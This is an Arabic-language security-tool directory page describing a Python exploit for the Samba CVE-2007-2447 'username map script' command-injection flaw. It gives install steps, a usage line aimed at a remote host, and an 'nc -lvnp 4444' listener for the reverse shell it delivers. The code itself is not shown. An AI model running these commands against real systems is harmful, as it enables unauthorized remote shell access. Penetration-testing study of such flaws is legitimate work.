Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2007-2447 — استغلال بلغة بايثون لثغرة CVE-2007-2447 التي تستهدف ثغرة برنامج نصي لخريطة اسم المستخدم في Samba، مما يتيح تنفيذ أوامر عن بُعد عبر حروف وصفات الصدفة مع تسليم حمولة شل عكسية. | Kitploit
أدوات/GitHubGitHub/0xkn/cve-2007-2447
تحليل الثغرات الأمنيةالاستغلالشيل كوداختبار الاختراقالقيادة والسيطرةأداة الوصول عن بعد
GitHub0xkn/cve-2007-2447

CVE-2007-2447

استغلال بلغة بايثون لثغرة CVE-2007-2447 التي تستهدف ثغرة برنامج نصي لخريطة اسم المستخدم في Samba، مما يتيح تنفيذ أوامر عن بُعد عبر حروف وصفات الصدفة مع تسليم حمولة شل عكسية.

عرض المستودع
منذ 5 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2007-2447 - username map script

"وظيفة MS-RPC في smbd في Samba من الإصدار 3.0.0 إلى 3.0.25rc3 تسمح للمهاجمين عن بُعد بتنفيذ أوامر عشوائية عبر محارف shell في دالة (1) SamrChangePassword، عندما يكون خيار "username map script" في smb.conf مفعلاً، وتسمح للمستخدمين الموثّقين عن بُعد بتنفيذ أوامر عبر محارف shell في دوال MS-RPC الأخرى في (2) إدارة الطابعات عن بُعد و(3) مشاركة الملفات."

Exploit

Installation:

[*] يتطلب هذا الاستغلال Python 3.7 أو أعلى

root@kitploit:~
python3 -m pip install pysmb 

Usage:

root@kitploit:~
$ ./CVE-2007-2447.py --rhost 10.10.10.3 --lhost 10.10.14.10 --lport 4444 --rport 445
  • --rhost -- المضيف البعيد
  • --lhost -- المضيف المحلي
  • --lport -- المنفذ المحلي
  • --rport -- المنفذ البعيد *[ ] اختياري. الافتراضي=445

لا تنسَ تشغيل المستمع الخاص بك:

root@kitploit:~
nc -lvnp 4444

PoC

image

تنزيل الأداة